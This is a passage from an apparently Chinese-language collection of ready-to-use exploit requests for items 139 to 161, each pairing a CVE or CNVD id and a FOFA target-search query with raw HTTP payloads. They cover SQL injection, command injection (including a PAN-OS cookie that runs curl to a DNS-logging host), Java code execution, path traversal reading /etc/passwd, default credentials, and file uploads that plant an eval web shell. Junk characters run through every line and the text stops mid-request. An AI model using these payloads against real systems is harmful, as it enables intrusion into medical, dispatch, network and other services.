* C& t) P7 x: {- A' h/ I! K! a+ }0 b4 ]4 [4 M& Y+ b7 r: T7 L, R. n2 o
4 T7 J, P! u+ r: g+ C
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
* D3 O: f; s1 l, q9 U' zCVE-2024-2622: {- f0 W+ s2 M. q+ M6 e7 _, Y Y8 ^
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
; b- n. a7 |' M& _GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.15 j* b% D- g' Y" E" W# V* D& W, @
Host: x.x.x.x" @# \; Q3 d+ b7 R, q# K# Q+ A) y9 b, n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
! M: R0 T1 @1 h1 bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 h' M5 `8 G& b; v& {* x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) y% l5 u6 [5 o5 a
Accept-Encoding: gzip, deflate, br3 c5 {, w* ]- Q# L( `8 V. b7 A
Connection: close( L/ D, j4 _" Q
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
# o5 |8 }1 K& O# c; Y0 VUpgrade-Insecure-Requests: 1* t; t8 W! [9 k3 q' W
4 l9 x- M4 K( ^8 ~
+ |& j+ A) A6 f: n140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
4 W- ]# x+ o5 p! t7 |CVE-2024-2566
+ l' {! i1 r! v6 bFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"; u* ?' V7 y! {' n% W p
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1# S; U8 O O6 G. y1 s8 A- {" G2 H
Host: x.x.x.x
) Y8 `7 y$ g8 D& ^. ^; NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
* i# z6 b6 Y+ a, U5 }& N: X* uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 E: j) a3 h; L+ eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ P( v* {) a$ ^: U9 c2 ?
Accept-Encoding: gzip, deflate, br; @5 a g8 C9 |8 _& i& d6 d
Connection: close% `( R8 o" \& h
Cookie: authcode=h8g9
; l9 n g* x0 q0 s iUpgrade-Insecure-Requests: 1% C+ Y2 S$ `: l6 z! r
1 q; S$ W2 W2 h7 \: W* l/ W0 r0 }- \- v
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
! X$ ~$ X3 \+ F$ L6 _FOFA:body="指挥调度管理平台"
3 L2 L4 e' J Y, D2 YPOST /app/ext/ajax_users.php HTTP/1.1, @4 E3 w' P& }. x! r
Host: your-ip/ k, H( V! W9 X) F5 o
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info6 p" j5 C9 y h$ |! G
Content-Type: application/x-www-form-urlencoded
# u+ P% N5 Y( b2 y% a$ T- D
4 c6 ?+ `' Z ]9 ~5 `" l/ E* P( o9 S* t( f
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
* R# N5 L" f. t6 g5 V2 n( D* i* L/ @5 t" r% i
% C$ | M: D9 B8 i& Y4 O1 ~142. CMSV6车辆监控平台系统中存在弱密码; x! h# V8 c/ P r) v
CVE-2024-29666; \. k% F) b& @* ~4 N' W% x2 ^
FOFA:body="/808gps/"
9 X; p# k- r& ^) B/ a# e7 oadmin/admin
: H9 p" F# [3 J0 z3 X143. Netis WF2780 v2.1.40144 远程命令执行5 k4 | ~" o/ X9 a7 z9 ^* u
CVE-2024-25850; }* C7 D6 ]7 r" p6 L- \
FOFA:title='AP setup' && header='netis'
) p# Y3 w9 F, J' wPAYLOAD
5 }/ p0 n$ R: b3 F- Q
( k( X8 x% x7 k' W& s0 Z. O# E. }144. D-Link nas_sharing.cgi 命令注入
4 [1 ^" J2 D* s; f: C! [% X& LFOFA:app="D_Link-DNS-ShareCenter"3 m( c9 V" h% D3 y
system参数用于传要执行的命令1 d4 t4 H' ^8 l# n
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.17 A( l" ^4 d* v9 q2 J) \
Host: x.x.x.x& `2 [% t* C7 U2 g
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0$ d/ U6 R1 D3 l; ~1 e
Connection: close
- f, o$ i% V% w; N/ m, G! B- I4 `Accept: */*
/ Q8 Y I% \) F9 `Accept-Language: en
/ Q( ^9 t* W: h9 \: s, P" z# G# IAccept-Encoding: gzip( ~% |# [# t" k* n, O% F; N
- B' P" T& _# C# g
J6 X8 h7 V, u9 t& q1 a% C, @
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入, ~7 W2 @& ~1 N2 O
CVE-2024-3400
& i/ v9 p6 F3 y0 SFOFA:icon_hash="-631559155"" h/ ]) u, r9 p \; R
GET /global-protect/login.esp HTTP/1.1
4 g' ?$ m" @% ~4 \+ ^4 y5 gHost: 192.168.30.112:1005
3 W# @2 v) w6 h! fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84& A' K1 ]) G* c" _& D7 x
Connection: close
Z; Z. k3 Z; [! q! S. z4 oCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;) Z0 f1 a6 U, c; k
Accept-Encoding: gzip
$ G1 z3 v( n1 r; {/ q) O' V2 \, X
+ U; g/ s3 }9 l& u' B2 g/ H& B0 M) B( K$ i* y4 e* E
146. MajorDoMo thumb.php 未授权远程代码执行 G/ I$ [+ j2 f/ a$ d& y3 G
CNVD-2024-02175) K4 W Z* f, g' J
FOFA:app="MajordomoSL"
/ G% s9 T5 ^0 }7 _ l* bGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.17 c J8 R% z* }$ j3 K" w0 J* e
Host: x.x.x.x/ _! l3 ?* V! Q! G( ~7 C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
% f2 } O/ q$ M3 ^ Q( E Y! p$ SAccept-Charset: utf-8
7 T" B, p7 l! g- b* w- Q* AAccept-Encoding: gzip, deflate2 I' k7 [! |0 t0 m; N1 S1 U, o7 ^# S9 ]9 p
Connection: close% n0 v# T. i3 N K6 W3 Y9 ?: d
+ K0 e/ s+ k1 t9 C
! ~% a- R0 T( ^' h* V147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
& @1 s- m, V% [0 ^# g; c& aCVE-2024-32399
9 L9 P; f N4 N( {, @& }FOFA:body="RaidenMAILD"
8 g1 \" a/ x: s# [% |) |' zGET /webeditor/../../../windows/win.ini HTTP/1.1, H3 h/ a. Y) b5 Z
Host: 127.0.0.1:81: @/ W$ E5 u, _2 ?+ F) b4 p( \5 m, S
Cache-Control: max-age=0/ n4 n l& E/ \) M1 F: z
Connection: close5 q0 {3 t( o3 G8 l
' y1 q! _) O6 r- S
! e4 _& @3 `8 \2 w148. CrushFTP 认证绕过模板注入
: n6 f; U/ ]4 x% ]: K8 c/ yCVE-2024-4040
V+ b* I- v, y. LFOFA:body="CrushFTP"' v+ B2 J5 \ v" s `4 L
PAYLOAD$ A8 d) ?" G3 i. z
: f2 Q7 k+ I G4 w9 e149. AJ-Report开源数据大屏存在远程命令执行
z( T' G* r- u; l1 Y# FFOFA:title="AJ-Report"/ S0 D3 F# f# @5 W; M1 w! v Y
. u' e" Y8 ]" O2 xPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
7 `0 u" B, F% n, k/ ^! K+ ?Host: x.x.x.x" G$ ]3 j, w4 K9 N9 w1 Q; V$ S: F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
/ U: m1 F. ?( `' J& r- bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' g. j# x' G; `& s$ ~2 d1 gAccept-Encoding: gzip, deflate, br1 k( ]& ]3 J1 f0 e [
Accept-Language: zh-CN,zh;q=0.91 M3 y9 A; S( Q. q6 T
Content-Type: application/json;charset=UTF-8
1 h' ~. q3 u9 `: S) H& JConnection: close* x1 v: ` H3 @% M( {7 {
9 j5 L7 @4 {1 s+ @) C9 k* [{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}4 ~/ b# j0 z" o* R
, l: b. @0 f$ b" o150. AJ-Report 1.4.0 认证绕过与远程代码执行
7 m$ j* h1 {2 \. ?FOFA:title="AJ-Report"
8 D% x9 f, }4 B3 q/ ^ i) BPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
+ T, `9 P% e% k, FHost: x.x.x.x' e+ {0 _2 j8 j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.369 ~# a4 y- ]8 i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! ^, W5 l% g8 _1 [Accept-Encoding: gzip, deflate, br
6 K7 ^; k, E1 `/ \3 h. QAccept-Language: zh-CN,zh;q=0.95 g$ |2 a" L! v( _$ t
Content-Type: application/json;charset=UTF-8. {0 U7 y( y: R
Connection: close. z- g! s3 M, T1 ~; c
Content-Length: 339
/ ]& W& }7 b$ H( Z) f6 [7 q1 N8 [0 J; F" ~ ]! F
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
* C* H! ^8 a+ j0 t. q: A c0 k; u; o2 p7 ?+ k9 s; ^ y9 l8 ~
: E3 |/ X* g: o4 z V151. AJ-Report 1.4.1 pageList sql注入
) |3 S# j$ e7 j; s5 }6 ZFOFA:title="AJ-Report"
; k: ]& j0 N' A; e4 XGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
" E) P2 `5 P* [# CHost: x.x.x.x
r7 Z* k, m3 XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
, R& O9 G l! o( T+ K7 o* VConnection: close
! P N8 D) ]& H4 ]. O" ]' h8 bAccept-Encoding: gzip5 @7 X7 z- R$ `$ d6 ~
, ~: a$ \$ s. x1 P5 \0 ~+ c+ W& `, m& j, `
152. Progress Kemp LoadMaster 远程命令执行
; J* J% d6 }9 bCVE-2024-1212
9 D' t1 c0 E& GLoadMaster <= 7.2.59.2 (GA)* a; @) t5 g- t8 s2 m
LoadMaster<=7.2.54.8 (LTSF)
& k1 ~* _" B- aLoadMaster <= 7.2.48.10 (LTS)
2 U- r" U |. x0 }2 W; b6 n" s& Y3 aFOFA:body="LoadMaster"% v* B% ?/ E+ o0 ]* X& c9 k7 m
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
; i* }. g' o: x2 k5 M( q& U, BGET /access/set?param=enableapi&value=1 HTTP/1.1
! o2 V2 D4 C5 E+ q( eHost: x.x.x.x
) `* e1 J) D6 }0 ^2 S. YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1+ n2 y r8 p9 Z5 I
Connection: close
8 u2 d3 a, S" p8 \+ |9 {( xAccept: */*8 V2 P1 j0 z k9 n6 t3 e
Accept-Language: en
4 `+ x+ w6 C; u' ^# h( gAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
8 w- H& a$ C8 e( Q" ]) K/ nAccept-Encoding: gzip
4 [( s k; s; _" s) A/ @$ `/ l6 z$ y5 l
2 ~9 F8 L x* J/ O
153. gradio任意文件读取
9 v! L2 W2 r- ]CVE-2024-1561FOFA:body="__gradio_mode__"
5 `6 O- {5 X& k+ X第一步,请求/config文件获取componets的id/ w- p' F7 X Z9 K
http://x.x.x.x/config: W) k( i k3 r/ a; L
/ O& [3 r, C' j# \
% j! f% p- b" C! T4 u9 Y' I! [第二步,将/etc/passwd的内容写入到一个临时文件
4 L% ^# o9 n- ~7 v: M- Q6 YPOST /component_server HTTP/1.1
) ?2 L; Z, X9 N0 z9 \% n6 mHost: x.x.x.x3 R9 K$ l# t1 G; M4 i- D" d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3( S' J. v. @! y
Connection: close
/ J# J9 _" L, m: ^, a0 d/ j0 p @Content-Length: 115
) L. i5 L& S/ a! y4 `3 uContent-Type: application/json. { t+ N: r. A" t
Accept-Encoding: gzip
" @% `' t* g" e, t& d5 F1 |( g0 F2 M& M( {# {/ J0 _6 ]( _# |
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}4 x; C0 x$ R: K2 j
" U' K9 b Z. x# Y8 F( `$ r! X% G
0 G% Z# t7 R3 S# Z6 z/ I( ^第三步访问
4 U# H: z6 i% x6 D# vhttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
7 [0 O* j! q) I
; W/ j" x8 `+ N+ b- D, P
6 g9 D7 n- d" ]# R. V1 P154. 天维尔消防救援作战调度平台 SQL注入
7 @0 c2 n+ _( c8 \# YCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"4 ], d! d4 t* [% t3 _ P# R; a% E L
POST /twms-service-mfs/mfsNotice/page HTTP/1.19 c; [/ u9 y/ V( u) l1 Z: \
Host: x.x.x.x' k( S% a3 j. v; W, L, E. \
Content-Length: 106
7 A) X8 s* M. ^$ J, FCache-Control: max-age=01 U% q2 f) l% f
Upgrade-Insecure-Requests: 15 s; V) H, C; H" Y, s
Origin: http://x.x.x.x" f8 [: `* H O- B
Content-Type: application/json& H6 ]2 [3 V: P/ y) o9 k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
& Q) F. r9 e {3 L* G0 AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; h# R7 u. k, ? T
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
$ T& ?' y: |, WAccept-Encoding: gzip, deflate
4 S3 n) ]0 Z5 K ~7 M2 uAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
_; k6 C* ^1 dConnection: close
2 }' a) ~4 H/ Z N( b& s; v
: I$ K9 \: m5 E# B& r- z{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}7 C& \9 U' D4 N& Y% `/ e2 F
% D. W$ ^$ F' W5 ?3 O2 X: ]
! u6 O1 [5 c0 S8 M: |9 a9 U155. 六零导航页 file.php 任意文件上传; t. v) v! v8 ^) o: A# E$ t6 e
CVE-2024-34982, ]; R- f1 A2 w
FOFA:title=="上网导航 - LyLme Spage"1 y& I. {: z9 x+ V, u: p" x1 ]
POST /include/file.php HTTP/1.1/ C( z5 t. v' P# E4 J. P' b) A% i
Host: x.x.x.x/ W+ d, O6 h+ {) f+ c4 Y6 s- r; }" _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
! \& `2 t1 k, _! GConnection: close( n2 G8 e# A% q
Content-Length: 232
4 W# M0 K0 _3 `/ E4 ^Accept: application/json, text/javascript, */*; q=0.01
6 W# m( z' ]5 a0 ]: e' v$ @3 ZAccept-Encoding: gzip, deflate, br
" {5 k6 Z/ j+ W+ fAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 f3 E" `' C. Y) n! a3 z
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
" U; Z& g# o$ f' B4 Z2 x; P- E& A& rX-Requested-With: XMLHttpRequest& p$ G+ C6 i5 l {/ t9 B: r8 c
. p$ V8 G5 G) Q1 i/ x2 ]-----------------------------qttl7vemrsold314zg0f
6 J) ^ j! s/ v5 K# W3 m( lContent-Disposition: form-data; name="file"; filename="test.php"
7 T' l' S+ |9 lContent-Type: image/png
) G% Z4 R- x6 w$ b R" ] Y) C
( b. L- h5 H/ N+ ]1 ?* {<?php phpinfo();unlink(__FILE__);?>1 x& \6 S7 L U+ X% G( g( s
-----------------------------qttl7vemrsold314zg0f--! f& E7 Y j3 U
# ]! ~- L- \) e) M; E
L, T. r6 {7 n9 K访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php" P1 H% v+ m% Z
, E+ j% M# s* Q8 Y7 R
156. TBK DVR-4104/DVR-4216 操作系统命令注入
; d c4 w7 w' h* NCVE-2024-3721
; P7 v3 h% C# ~+ W; ^) t9 v5 e" c1 WFOFA:"Location: /login.rsp"
& G1 W" R. ?4 Q) C- j·TBK DVR-4104
( o, z6 Q3 \7 ^1 \4 V* q- r. `; ~8 i·TBK DVR-4216
/ S2 y" ~; d6 ~) N* I* u( pcurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
0 o/ |- Q- x" c9 H6 t$ m
& O( j1 e7 e# I6 c# L5 m5 _ l' m
( g6 M& c0 J# z, }0 r; RPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
# F7 B; |6 }! \& eHost: x.x.x.x
% I: x- j; X" X( C4 NUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) j5 @5 O9 ~/ b& t3 z0 g% k- NConnection: close
M0 M* I6 o& X: e. F. C) S. ^Content-Length: 04 f, ~( `0 ^6 w5 U2 w$ X/ Q
Cookie: uid=1" u+ Y/ p* k3 [" k
Accept-Encoding: gzip. z; y6 C0 W4 X2 b$ [
# N- e- p ~- O' S9 G* d4 t# A: e; o+ v& W# V
157. 美特CRM upload.jsp 任意文件上传2 U( ]% b2 N8 _" X- t9 y( i
CNVD-2023-06971( i$ f. F0 k L+ \
FOFA:body="/common/scripts/basic.js"
% N& C5 a1 ~+ N2 a- ]POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
8 K( p$ ], q6 ?; S$ G6 THost: x.x.x.x
% {+ U- l7 T! E$ J$ z3 Q+ f2 nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
! |0 d1 u b2 ^% w. A( i9 WContent-Length: 7090 F# @* l' W! g$ ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- V1 W& ]( m* o$ I8 G
Accept-Encoding: gzip, deflate
3 G& X( r2 J/ G2 R" HAccept-Language: zh-CN,zh;q=0.96 r D% G! |- x5 c6 j; H4 u
Cache-Control: max-age=08 B- x7 U8 [. X4 d/ n' J
Connection: close; a! a Q3 D. ]/ N
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN" I6 V- _: w, ?' k$ m* S+ q. Q" \
Upgrade-Insecure-Requests: 1
! W1 X2 G* ?1 c6 `& c9 [2 u2 k) u6 O/ ~& X
------WebKitFormBoundary1imovELzPsfzp5dN
5 Z4 [6 c. n& ~+ [Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"7 b0 K5 Y; d/ g, Q
Content-Type: application/octet-stream, p5 t$ i# H. Y- l# ]; \5 B- {" K
; M4 u# K1 r/ @, }) v
nyhelxrutzwhrsvsrafb, l, @# f {: S& }. U" S: U) X; \
------WebKitFormBoundary1imovELzPsfzp5dN
5 k4 m" i) D+ G$ _. C, jContent-Disposition: form-data; name="key"
! H3 I- d) ?3 |) f
4 v2 T# v7 T0 e4 K) `; inull1 [8 P( T# {& C
------WebKitFormBoundary1imovELzPsfzp5dN) [/ k4 Z$ R1 p% x) O- S
Content-Disposition: form-data; name="form"% L" R6 L* e) v8 H9 F `
7 U7 J* L. [. M7 m/ ~' r4 M
null
; ?6 E b/ v; N7 a! \) Q------WebKitFormBoundary1imovELzPsfzp5dN3 i0 x- N) h" ?/ ^1 v, j6 k8 A
Content-Disposition: form-data; name="field"5 p/ D$ r# B0 k9 m
5 t0 |+ N' D3 Y0 E* w# G3 Snull
2 z+ Z1 K/ r% s: S; T' z0 J------WebKitFormBoundary1imovELzPsfzp5dN1 l, J; S. | p9 K" i( P
Content-Disposition: form-data; name="filetitile", V3 A# T( c7 r* ^
/ z' X. G% x. v8 g4 w% \
null
9 W. X; k5 W) i3 s2 ]------WebKitFormBoundary1imovELzPsfzp5dN
4 _9 @% ?; M% a; P- f, c+ cContent-Disposition: form-data; name="filefolder"2 w% X2 q+ T1 R( Q5 B1 Q: _
- ]9 r. Y0 P: D/ d" m, P7 K
null! Z. U. l5 w9 M# K3 j( J0 l
------WebKitFormBoundary1imovELzPsfzp5dN--
* y3 B- |4 `( J- F2 y; t+ V8 X% C/ f. x" ~- x0 r" E J: g" T' ]% U
+ V& B, H9 ]0 ?4 F) W! i, W
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp n) Q8 ?$ ?6 a7 I' A/ G" u# ?3 z' l& E
( a [& n) T& D158. Mura-CMS-processAsyncObject存在SQL注入
6 f2 q1 i! E: ?) G) D }CVE-2024-32640
, z% {" M, k( U6 d4 ^/ B" D) y- ?FOFA:"Generator: Masa CMS"; A3 _, D+ C V
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1: V% F; s9 V' o5 X
Host: {{Hostname}}
7 D, o3 @, y9 r4 L5 [) [' O6 \% pContent-Type: application/x-www-form-urlencoded( N9 g1 y5 e( m
' I* ^+ q3 X$ a; u4 Z
object=displayregion&contenthistid=x\'&previewid=1
u b! U9 P6 b# b4 U! [
' b0 g8 I3 t+ e& n3 I: {' B, A+ A5 M
0 A6 a! a( B; W5 {3 a159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
, z/ a* {9 r/ @# V# ~- S6 X4 rFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
/ S# U+ K0 w* T( C. O% nPOST /webservices/WebJobUpload.asmx HTTP/1.1
+ Z4 T% p6 \' [. F/ A- IHost: x.x.x.x
3 v% A$ ^& _; o6 t8 b, x3 qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
0 q. w! S$ q0 R: g, dContent-Length: 1080# }3 {1 g/ K9 p! r. k
Accept-Encoding: gzip, deflate
. [5 M+ G2 |( t" z* u1 v N7 C& NConnection: close
# o1 _+ v) o, q+ T0 |Content-Type: text/xml; charset=utf-82 P% w) @& O" e5 Y
Soapaction: "http://rainier/jobUpload"
; g; w6 s. d( R! w( V4 Y
% Y6 j3 p$ C; [& x2 A3 n<?xml version="1.0" encoding="utf-8"?>( f: _) I% z6 P; Q' x9 F2 M
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
$ J2 W! ]( o# t& q* I) }% Y<soap:Body>* D8 O- j6 x! H- M# v
<jobUpload xmlns="http://rainier">4 |+ \9 e, K% v+ y8 r- x
<vcode>1</vcode>
7 D$ p6 I3 Y5 z: m2 a<subFolder></subFolder>+ |5 H& e/ [' ~8 {( j6 V# N
<fileName>abcrce.asmx</fileName>
$ A' o* r! w% [5 Q/ B# p<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
$ I: \- d% a/ s2 p</jobUpload>
! W% ]. R1 b+ M( C$ r</soap:Body>/ }1 a, h W) k; o( S
</soap:Envelope>" c) h, H) U7 X, L0 _7 h
% c5 Y% _1 O- z
. a0 @$ O4 y7 o9 Q' o u0 P4 I" z/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
; R2 R7 H$ K/ e% @
' k4 J& a+ e9 A! Y
! A. n6 @7 N- C9 n' b: a) g, e160. Sonatype Nexus Repository 3目录遍历与文件读取
# K* t+ o" y# s. p; G, C- aCVE-2024-4956
% Y5 ^% R0 I' ?1 W2 A0 vFOFA:title="Nexus Repository Manager"
2 U$ M4 ?* S- D2 j2 FGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
/ u% ]! D# |; z* h6 z" U! sHost: x.x.x.x" v: ~0 F7 L# w3 G
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.02 I% H- R, u5 X( t- F
Connection: close" h. K* a7 L0 g3 Q
Accept: */*/ B' l0 [& s8 [. X5 c+ ?2 a' J3 m
Accept-Language: en
; w- S9 ?+ v. \/ M, T1 ~Accept-Encoding: gzip
0 h" d* G% C! m4 G& O5 w
( ?7 N# ?6 _2 s3 F; Z
( H. A' A9 X( ~- R& K4 T161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传+ I, z+ e- z# }% B( ^
FOFA:body="/KT_Css/qd_defaul.css"
- \3 K9 {6 r# Q# y1 [2 M5 I4 c1 @第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密& y( W; Q! J$ h: k1 C6 M* I
POST /Webservice.asmx HTTP/1.1! h! Q8 g( V, x( ]. E9 @" l2 E8 S
Host: x.x.x.x/ f: h5 D( ]& G: ?" f9 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.364 a# p3 K; I& I/ |9 i. K0 f
Connection: close. ~) f$ H4 d% ^9 c4 f
Content-Length: 445
, B4 X& g# A6 b0 ]' k* BContent-Type: text/xml$ t; Z+ j4 W9 I
Accept-Encoding: gzip
6 W8 _8 D& C' s) ~. h6 i! V5 u
$ ~2 q) F, G; \6 c& A<?xml version="1.0" encoding="utf-8"?>: v! G. ~, n; |1 O ~0 `4 J/ [
<soap:Envelope xmlns:xsi=", W/ i$ L' ?( _ [6 F0 Z
